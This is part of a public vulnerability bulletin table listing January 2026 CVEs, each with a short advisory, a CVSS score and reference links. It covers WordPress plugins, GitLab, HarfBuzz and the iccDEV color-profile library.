| furqan-khanzada--Menu Card | The Menu Card plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the `category` parameter in all versions up to, and including, 0.8.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13862 | https://www.wordfence.com/threat-intel/vulnerabilities/id/cec428cd-0fa1-4bc4-b7f6-faf90c31f306?source=cve https://plugins.trac.wordpress.org/browser/menu-card/trunk/menu-card.php#L102 https://plugins.trac.wordpress.org/browser/menu-card/tags/0.8.0/menu-card.php#L102 |
| galdub--Folders Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager | The Folders - Unlimited Folders to Organize Media Library Folder, Pages, Posts, File Manager plugin for WordPress is vulnerable to Unauthorized Arbitrary Media Replacement in all versions up to, and including, 3.1.5. This is due to missing object-level authorization checks in the handle_folders_file_upload() function. This makes it possible for authenticated attackers, with Author-level access and above, to replace arbitrary media files from the WordPress Media Library. | 2026-01-08 | 4.3 | CVE-2025-12640 | https://www.wordfence.com/threat-intel/vulnerabilities/id/ac6432a4-6597-4d1e-b63d-c007a301d1b2?source=cve https://plugins.trac.wordpress.org/changeset/3402986/folders/tags/3.1.6/includes/media.replace.php |
| ghera74--ilGhera Support System for WooCommerce | The ilGhera Support System for WooCommerce plugin for WordPress is vulnerable to unauthorized modification and loss of data due to a missing capability check on the 'delete_single_ticket_callback' and 'change_ticket_status_callback' functions in all versions up to, and including, 1.2.6. This makes it possible for authenticated attackers, with Subscriber-level access and above, to delete arbitrary support tickets and modify their status. | 2026-01-06 | 5.3 | CVE-2025-14034 | https://www.wordfence.com/threat-intel/vulnerabilities/id/e74fb552-3ef4-47cd-8fe6-8cc1e74b8377?source=cve https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L1331 https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L1331 https://plugins.trac.wordpress.org/browser/wc-support-system/trunk/includes/class-wc-support-system.php#L865 https://plugins.trac.wordpress.org/browser/wc-support-system/tags/1.2.6/includes/class-wc-support-system.php#L865 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&old=3426161%40wc-support-system&new=3426161%40wc-support-system&sfp_email=&sfph_mail= |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 8.3 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to create a denial of service condition by providing crafted responses to external API calls. | 2026-01-09 | 6.5 | CVE-2025-10569 | GitLab Issue #570528 HackerOne Bug Bounty Report #3284689 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab EE affecting all versions from 18.5 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user to modify instance-wide AI feature provider settings by exploiting missing authorization checks in GraphQL mutations. | 2026-01-09 | 6.5 | CVE-2025-13781 | GitLab Issue #578756 HackerOne Bug Bounty Report #3400940 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| GitLab--GitLab | GitLab has remediated an issue in GitLab CE/EE affecting all versions from 15.4 before 18.5.5, 18.6 before 18.6.3, and 18.7 before 18.7.1 that could have allowed an authenticated user with specific permissions to remove all project runners from unrelated projects by manipulating GraphQL runner associations. | 2026-01-09 | 5.4 | CVE-2025-11246 | GitLab Issue #573728 HackerOne Bug Bounty Report #3292475 https://about.gitlab.com/releases/2026/01/07/patch-release-gitlab-18-7-1-released/ |
| glenwpcoder--Drag and Drop Multiple File Upload for Contact Form 7 | The Drag and Drop Multiple File Upload - Contact Form 7 plugin for WordPress is vulnerable to limited upload of files with a dangerous type in all versions up to, and including, 1.3.9.2. This is due to the plugin not blocking .phar and .svg files. This makes it possible for unauthenticated attackers to upload arbitrary .phar or .svg files containing malicious PHP or JavaScript code. Malicious PHP code can be used to achieve remote code execution on the server via direct file access, if the server is configured to execute .phar files as PHP. The upload of .svg files allows for Stored Cross-Site Scripting under certain circumstances. | 2026-01-07 | 6.1 | CVE-2025-14842 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c78a0325-5bbf-4550-8477-94247f085e40?source=cve https://plugins.trac.wordpress.org/browser/drag-and-drop-multiple-file-upload-contact-form-7/trunk/inc/dnd-upload-cf7.php#L1116 https://plugins.trac.wordpress.org/browser/drag-and-drop-multiple-file-upload-contact-form-7/trunk/inc/dnd-upload-cf7.php#L108 https://plugins.trac.wordpress.org/browser/contact-form-7/trunk/includes/formatting.php#L310 https://plugins.trac.wordpress.org/changeset?sfp_email=&sfph_mail=&reponame=&new=3428236%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&old=3415946%40drag-and-drop-multiple-file-upload-contact-form-7%2Ftrunk&sfp_email=&sfph_mail= |
| greenshady--Entry Views | The Entry Views plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the plugin's 'entry-views' shortcode in all versions up to, and including, 1.0.0 due to insufficient input sanitization and output escaping on user supplied attributes. This makes it possible for authenticated attackers, with contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-13729 | https://www.wordfence.com/threat-intel/vulnerabilities/id/0e7e9fcc-804a-46a8-95cd-b358ba7681ec?source=cve https://plugins.trac.wordpress.org/browser/entry-views/tags/1.0.0/inc/shortcodes.php#L25 https://plugins.trac.wordpress.org/browser/entry-views/tags/1.0.0/inc/shortcodes.php#L36 https://plugins.trac.wordpress.org/browser/entry-views/tags/1.0.0/inc/template.php#L35 |
| Guangzhou V--V-SOL GPON/EPON OLT Platform | V-SOL GPON/EPON OLT Platform v2.03 contains multiple reflected cross-site scripting vulnerabilities due to improper input sanitization in various script parameters. Attackers can exploit these vulnerabilities by injecting malicious HTML and script code to execute arbitrary scripts in a victim's browser session. | 2026-01-07 | 6.1 | CVE-2019-25284 | Zero Science Lab Vulnerability Advisory Packet Storm Security Exploit Entry IBM X-Force Vulnerability Exchange CXSecurity Vulnerability Database VSOL Vendor Homepage |
| guchengwuyue--yshopmall | A vulnerability was determined in guchengwuyue yshopmall up to 1.9.1. Affected is the function getPage of the file /api/jobs. This manipulation of the argument sort causes sql injection. The attack may be initiated remotely. The exploit has been publicly disclosed and may be utilized. The project was informed of the problem early through an issue report but has not responded yet. | 2026-01-09 | 6.3 | CVE-2025-15496 | VDB-340274 | guchengwuyue yshopmall jobs getPage sql injection VDB-340274 | CTI Indicators (IOB, IOC, TTP, IOA) Submit #726464 | https://github.com/guchengwuyue/yshopmall yshopmall V1.9.1 SQL Injection https://github.com/guchengwuyue/yshopmall/issues/39 https://github.com/guchengwuyue/yshopmall/issues/39#issue-3769727898 |
| Hakob--Re Gallery & Responsive Photo Gallery Plugin | Missing Authorization vulnerability in Hakob Re Gallery & Responsive Photo Gallery Plugin allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Re Gallery & Responsive Photo Gallery Plugin: from n/a through 1.17.18. | 2026-01-08 | 5.3 | CVE-2026-22486 | https://patchstack.com/database/wordpress/plugin/regallery/vulnerability/wordpress-re-gallery-responsive-photo-gallery-plugin-plugin-1-17-17-broken-access-control-vulnerability?_s_id=cve |
| harfbuzz--harfbuzz | HarfBuzz is a text shaping engine. Prior to version 12.3.0, a null pointer dereference vulnerability exists in the SubtableUnicodesCache::create function located in src/hb-ot-cmap-table.hh. The function fails to check if hb_malloc returns NULL before using placement new to construct an object at the returned pointer address. When hb_malloc fails to allocate memory (which can occur in low-memory conditions or when using custom allocators that simulate allocation failures), it returns NULL. The code then attempts to call the constructor on this null pointer using placement new syntax, resulting in undefined behavior and a Segmentation Fault. This issue has been patched in version 12.3.0. | 2026-01-10 | 5.3 | CVE-2026-22693 | https://github.com/harfbuzz/harfbuzz/security/advisories/GHSA-xvjr-f2r9-c7ww https://github.com/harfbuzz/harfbuzz/commit/1265ff8d990284f04d8768f35b0e20ae5f60daae |
| hayyatapps--Stylish Order Form Builder | The Stylish Order Form Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'product_name' parameter in all versions up to, and including, 1.0 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Subscriber-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-07 | 6.4 | CVE-2025-13531 | https://www.wordfence.com/threat-intel/vulnerabilities/id/2d9c4d9d-5d4c-4ea9-bf8d-0ee634f9ca7c?source=cve https://plugins.trac.wordpress.org/browser/stylish-order-form-builder/trunk/functions-admin.php#L74 https://plugins.trac.wordpress.org/browser/stylish-order-form-builder/tags/1.0/functions-admin.php#L74 https://plugins.trac.wordpress.org/browser/stylish-order-form-builder/trunk/Pages/manage-forms/includes/all-products.php#L9 https://plugins.trac.wordpress.org/browser/stylish-order-form-builder/tags/1.0/Pages/manage-forms/includes/all-products.php#L9 |
| hblpay--HBLPAY Payment Gateway for WooCommerce | The HBLPAY Payment Gateway for WooCommerce plugin for WordPress is vulnerable to Reflected Cross-Site Scripting via the 'cusdata' parameter in all versions up to, and including, 5.0.0 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link. | 2026-01-07 | 6.1 | CVE-2025-14875 | https://www.wordfence.com/threat-intel/vulnerabilities/id/06362518-f2ee-485f-9e0e-1b1ada9c72db?source=cve https://plugins.trac.wordpress.org/browser/hblpay-payment-gateway-for-woocommerce/trunk/hblpay-paymentgateway-woocommerce.php#L248 |
| HCLSoftware--DevOps Deploy | In HCL DevOps Deploy 8.1.2.0 through 8.1.2.3, a user with LLM configuration privileges may be able to recover a credential previously saved for performing authenticated LLM Queries. | 2026-01-07 | 4.9 | CVE-2025-62327 | https://support.hcl-software.com/csm?id=kb_article&sysparm_article=KB0127336 |
| helpdeskcom--HelpDesk contact form plugin | The HelpDesk contact form plugin for WordPress is vulnerable to Cross-Site Request Forgery in all versions up to, and including, 1.1.5. This is due to missing or incorrect nonce validation on the handle_query_args() function. This makes it possible for unauthenticated attackers to update the plugin's license ID and contact form ID settings via a forged request granted they can trick a site administrator into performing an action such as clicking on a link. | 2026-01-07 | 4.3 | CVE-2025-13657 | https://www.wordfence.com/threat-intel/vulnerabilities/id/342ece60-faf1-4fee-bf1e-6f6107f32861?source=cve https://plugins.trac.wordpress.org/browser/helpdesk-contact-form/trunk/includes/class-admin-page.php#L63 https://plugins.trac.wordpress.org/browser/helpdesk-contact-form/tags/1.1.5/includes/class-admin-page.php#L63 |
| IdeaBox Creations--Dashboard Welcome for Beaver Builder | Missing Authorization vulnerability in IdeaBox Creations Dashboard Welcome for Beaver Builder allows Exploiting Incorrectly Configured Access Control Security Levels.This issue affects Dashboard Welcome for Beaver Builder: from n/a through 1.0.8. | 2026-01-08 | 5.3 | CVE-2026-22488 | https://patchstack.com/database/wordpress/plugin/dashboard-welcome-for-beaver-builder/vulnerability/wordpress-dashboard-welcome-for-beaver-builder-plugin-1-0-8-broken-access-control-vulnerability?_s_id=cve |
| Ideagen--DevonWay | Ideagen DevonWay contains a stored cross site scripting vulnerability. A remote, authenticated attacker could craft a payload in the 'Reports' page that executes when another user views the report. Fixed in 2.62.4 and 2.62 LTS. | 2026-01-08 | 5.5 | CVE-2026-22587 | url url |
| imtiazrayhan--ConvertForce Popup Builder | The ConvertForce Popup Builder plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the Gutenberg block's `entrance_animation` attribute in all versions up to, and including, 0.0.7. This is due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with Author-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-10 | 6.4 | CVE-2025-14506 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c57b9a78-53f4-40bb-ae6a-c5242b41329f?source=cve https://plugins.trac.wordpress.org/browser/convertforce-popup-builder/trunk/inc/Blocks/Conversion.php#L47 https://plugins.trac.wordpress.org/browser/convertforce-popup-builder/trunk/inc/Blocks/Conversion.php#L66 https://plugins.trac.wordpress.org/changeset/3419678/ |
| indieweb--IndieWeb | The IndieWeb plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'Telephone' parameter in all versions up to, and including, 4.0.5 due to insufficient input sanitization and output escaping. This makes it possible for authenticated attackers, with author level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page. | 2026-01-09 | 6.4 | CVE-2025-14893 | https://www.wordfence.com/threat-intel/vulnerabilities/id/b29f0fea-a2db-4b2e-b7b8-d15b2395e9e6?source=cve https://plugins.trac.wordpress.org/changeset/3423983/ |
| infosatech--WP Page Permalink Extension | The WP Page Permalink Extension plugin for WordPress is vulnerable to Missing Authorization in all versions up to, and including, 1.5.4. This is due to missing authorization checks on the `cwpp_trigger_flush_rewrite_rules` function hooked to `wp_ajax_cwpp_trigger_flush_rewrite_rules`. This makes it possible for authenticated attackers, with Subscriber-level access and above, to flush the site's rewrite rules via the `action` parameter. | 2026-01-09 | 6.5 | CVE-2025-14172 | https://www.wordfence.com/threat-intel/vulnerabilities/id/c5ba37d7-8fde-4ee3-93db-d2459da34bc4?source=cve https://plugins.trac.wordpress.org/browser/change-wp-page-permalinks/trunk/change-wp-page-permalinks.php#L188 https://plugins.trac.wordpress.org/browser/change-wp-page-permalinks/tags/1.5.4/change-wp-page-permalinks.php#L188 |
| INIM Electronics s.r.l.--Smartliving SmartLAN/G/SI | Smartliving SmartLAN/G/SI <=6.x contains an unauthenticated server-side request forgery vulnerability in the GetImage functionality through the 'host' parameter. Attackers can exploit the onvif.cgi endpoint by specifying external domains to bypass firewalls and perform network enumeration through arbitrary HTTP requests. | 2026-01-07 | 5.3 | CVE-2019-25290 | Zero Science Lab Vulnerability Advisory Exploit Database Entry 47764 Packet Storm Security Exploit File IBM X-Force Vulnerability Exchange Entry INIM Vendor Homepage |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below have an Out-of-bounds Read, Use of Out-of-range Pointer Offset and have Improper Input Validation in its CIccProfile::LoadTag function. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 6.1 | CVE-2026-21487 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-xq7x-9524-f7cp https://github.com/InternationalColorConsortium/iccDEV/issues/340 https://github.com/InternationalColorConsortium/iccDEV/commit/1516e2cafc253bb06fd3700d589a4ed0f09f7bd6 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below are vulnerable to Out-of-bounds Read, Heap-based Buffer Overflow and Improper Null Termination through its CIccTagText::Read function. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 6.1 | CVE-2026-21488 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-4j2g-rvv4-86vg https://github.com/InternationalColorConsortium/iccDEV/commit/9daaccceb231c43db8cab312ee5bbe9d2aa6b153 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below have Out-of-bounds Read and Integer Underflow (Wrap or Wraparound) vulnerabilities in its CIccCalculatorFunc::SequenceNeedTempReset function. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 6.1 | CVE-2026-21489 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-ph89-6q5h-wfw5 https://github.com/InternationalColorConsortium/iccDEV/commit/cfabfe52c9c7eb0481b62c8aad56580bb11efdad |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. A vulnerability present in versions prior to 2.3.1.2 affects users of the iccDEV library who process ICC color profiles. It results in heap buffer overflow in `CIccTagLut16::Validate()`. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-06 | 6.1 | CVE-2026-21490 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-9q9c-699q-xr2q https://github.com/InternationalColorConsortium/iccDEV/issues/397 https://github.com/InternationalColorConsortium/iccDEV/commit/7c2cb719a9de1c00844e457e070d657314383ee3 https://github.com/InternationalColorConsortium/iccDEV/commit/e91fe722ac54ce497d410153e7405090e0565d7b |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. A vulnerability present in versions prior to 2.3.1.2 affects users of the iccDEV library who process ICC color profiles. It results in unicode buffer overflow in `CIccTagTextDescription`. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-06 | 6.1 | CVE-2026-21491 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-4pv4-4x2x-6j88 https://github.com/InternationalColorConsortium/iccDEV/issues/396 https://github.com/InternationalColorConsortium/iccDEV/commit/7c2cb719a9de1c00844e457e070d657314383ee3 https://github.com/InternationalColorConsortium/iccDEV/commit/e91fe722ac54ce497d410153e7405090e0565d7b |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools for working with ICC color management profiles. Versions 2.3.1.1 and below are vulnerable to Type Confusion in its CIccSingleSampledeCurveXml class during XML Curve Serialization. This issue is fixed in version 2.3.1.2. | 2026-01-06 | 6.6 | CVE-2026-21493 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-p85g-f9q7-jmjx https://github.com/InternationalColorConsortium/iccDEV/issues/358 https://github.com/InternationalColorConsortium/iccDEV/commit/7ff76d1471077172f9659de8d9536443eac7c48f |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. A vulnerability present in versions prior to 2.3.1.2 affects users of the iccDEV library who process ICC color profiles. It results in heap buffer overflow in `CIccTagLut8::Validate()`. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-06 | 6.1 | CVE-2026-21494 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-hjxv-xr7w-84fc https://github.com/InternationalColorConsortium/iccDEV/issues/398 https://github.com/InternationalColorConsortium/iccDEV/commit/7c2cb719a9de1c00844e457e070d657314383ee3 https://github.com/InternationalColorConsortium/iccDEV/commit/e91fe722ac54ce497d410153e7405090e0565d7b |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV has undefined behavior due to a null pointer passed to memcpy() in CIccTagSparseMatrixArray. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 6.1 | CVE-2026-21503 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-h554-qrfh-53gx https://github.com/InternationalColorConsortium/iccDEV/issues/367 https://github.com/InternationalColorConsortium/iccDEV/pull/417 https://github.com/InternationalColorConsortium/iccDEV/commit/55259a6395c4f6124b5d0e38469c77412926bd3d |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to heap buffer overflow in the ToneMap parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 6.6 | CVE-2026-21504 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-rqp9-r53c-3m9h https://github.com/InternationalColorConsortium/iccDEV/issues/366 https://github.com/InternationalColorConsortium/iccDEV/pull/415 https://github.com/InternationalColorConsortium/iccDEV/commit/14fe3785e6b1f9992375b2a24617a0d7f6a70f95 https://github.com/InternationalColorConsortium/iccDEV/commit/23a38f83f2a5874a1c4427df59ec342af3277cad https://github.com/InternationalColorConsortium/iccDEV/blob/798be59011649a26a529600cc3cd56437634d3d0/IccProfLib/IccMpeBasic.cpp#L4557 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a NULL pointer dereference vulnerability. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 6.5 | CVE-2026-21680 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-mgp7-w4w3-mhx4 https://github.com/InternationalColorConsortium/iccDEV/issues/322 https://github.com/InternationalColorConsortium/iccDEV/pull/325 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `CIccProfileXml::ParseBasic()` at `IccXML/IccLibXML/IccProfileXml.cpp`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 6.5 | CVE-2026-21689 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-5rqc-w93q-589m https://github.com/InternationalColorConsortium/iccDEV/issues/382 https://github.com/InternationalColorConsortium/iccDEV/pull/423 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a Type Confusion vulnerability in `CIccTagXmlTagData::ToXml()`. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-07 | 6.3 | CVE-2026-21690 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-2f26-vh48-38g6 https://github.com/InternationalColorConsortium/iccDEV/issues/393 https://github.com/InternationalColorConsortium/iccDEV/pull/426 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of International Color Consortium (ICC) color management profiles. Versions prior to 2.3.1.2 have a NULL pointer member call vulnerability. This vulnerability affects users of the iccDEV library who process ICC color profiles. Version 2.3.1.2 contains a patch. No known workarounds are available. | 2026-01-06 | 5.5 | CVE-2026-21492 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-xpq3-v3jj-mgvx https://github.com/InternationalColorConsortium/iccDEV/issues/394 https://github.com/InternationalColorConsortium/iccDEV/pull/401 https://github.com/InternationalColorConsortium/iccDEV/commit/b200a629ada310137d6ae5c53fc9e6d91a4b0dae https://github.com/InternationalColorConsortium/iccDEV/commit/e72361d215351cbac0002466c4f936e94d6a99e7 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to division by zero in the TIFF Image Reader. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21495 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-xhrm-79rg-5784 https://github.com/InternationalColorConsortium/iccDEV/commit/10c34179a0332a869c2b46e305a9cd23a6311dfe |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the signature parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21496 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-wj8m-6w77-r4rw https://github.com/InternationalColorConsortium/iccDEV/issues/381 https://github.com/InternationalColorConsortium/iccDEV/pull/405 https://github.com/InternationalColorConsortium/iccDEV/commit/0e51ceb427925b7e22f0465547df7506d35cda1c https://github.com/InternationalColorConsortium/iccDEV/commit/b5ad23aceece3789bdf1c47bae1ecf9d7bfcd26d |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via an unknown tag parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21497 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-7gv7-cmrv-4j85 https://github.com/InternationalColorConsortium/iccDEV/issues/374 https://github.com/InternationalColorConsortium/iccDEV/pull/403 https://github.com/InternationalColorConsortium/iccDEV/commit/9419cac7f084197941994b8b9d17def204008385 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the XML calculator parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21498 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-6822-qvxq-m736 https://github.com/InternationalColorConsortium/iccDEV/issues/375 https://github.com/InternationalColorConsortium/iccDEV/pull/404 https://github.com/InternationalColorConsortium/iccDEV/commit/75f124f40ba45491211cb4b67f0e05b7c7d59553 https://github.com/InternationalColorConsortium/iccDEV/commit/bdfa31940726aaabb0a6f19194d9062ba0598959 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the XML parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21499 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-c3pv-2cpf-7v2p https://github.com/InternationalColorConsortium/iccDEV/issues/372 https://github.com/InternationalColorConsortium/iccDEV/pull/412 https://github.com/InternationalColorConsortium/iccDEV/commit/00c03013e11b35ddbd7caae4368d1add185849d9 https://github.com/InternationalColorConsortium/iccDEV/commit/af299895bbcbecca6f67d6dc3d8e1dc92f1fc3fa https://github.com/InternationalColorConsortium/iccDEV/blob/8e71f0a701abcbd554725ba7b70258203e682a61/IccXML/IccLibXML/IccProfileXml.cpp#L477 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to stack overflow in the XML calculator macro expansion. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21500 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-4h4j-mm9w-2cp4 https://github.com/InternationalColorConsortium/iccDEV/issues/384 https://github.com/InternationalColorConsortium/iccDEV/pull/406 https://github.com/InternationalColorConsortium/iccDEV/commit/cce5f9b68a6c067b7ef898ccd5b000770745fb14 https://github.com/InternationalColorConsortium/iccDEV/commit/f295826a6f15add90490030f23b2ddd8593bff5b |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to stack overflow in the calculator parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21501 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-x7hw-h22p-2x4w https://github.com/InternationalColorConsortium/iccDEV/issues/365 https://github.com/InternationalColorConsortium/iccDEV/pull/413 https://github.com/InternationalColorConsortium/iccDEV/commit/798be59011649a26a529600cc3cd56437634d3d0 https://github.com/InternationalColorConsortium/iccDEV/commit/f3056ed99935d479091470127ad16f8be1912bb7 https://github.com/InternationalColorConsortium/iccDEV/blob/8e71f0a701abcbd554725ba7b70258203e682a61/IccProfLib/IccMpeCalc.cpp#L4588 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to NULL pointer dereference via the XML tag parser. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21502 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-67r8-q3mh-42j6 https://github.com/InternationalColorConsortium/iccDEV/issues/368 https://github.com/InternationalColorConsortium/iccDEV/pull/407 https://github.com/InternationalColorConsortium/iccDEV/commit/d04c236775e89a029f93efcc242fdb1fbc245a1c https://github.com/InternationalColorConsortium/iccDEV/commit/d9e42a1fb2606e25e498eb94f34f6da89f522e35 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV has undefined behavior due to an invalid enum value. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21505 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-j577-8285-qrf9 https://github.com/InternationalColorConsortium/iccDEV/issues/361 https://github.com/InternationalColorConsortium/iccDEV/pull/419 https://github.com/InternationalColorConsortium/iccDEV/commit/3bbe2088b2796cf0aa4f7fa19f7ccd9ad1c7aba5 https://github.com/InternationalColorConsortium/iccDEV/commit/b1bb72fc3e9442ee1355aabae7314bb7d3fc9d41 |
| InternationalColorConsortium--iccDEV | iccDEV provides a set of libraries and tools that allow for the interaction, manipulation, and application of ICC color management profiles. Prior to version 2.3.1.2, iccDEV is vulnerable to Null pointer dereference in CIccProfileXml::ParseBasic(), leading to denial of service. This issue has been patched in version 2.3.1.2. | 2026-01-07 | 5.5 | CVE-2026-21506 | https://github.com/InternationalColorConsortium/iccDEV/security/advisories/GHSA-wfm7-m548-x4vp https://github.com/InternationalColorConsortium/iccDEV/issues/371 https://github.com/InternationalColorConsortium/iccDEV/pull/418 https://github.com/InternationalColorConsortium/iccDEV/commit/f2ea32372ad3ebbd29147940229cb9c5548fe033 |
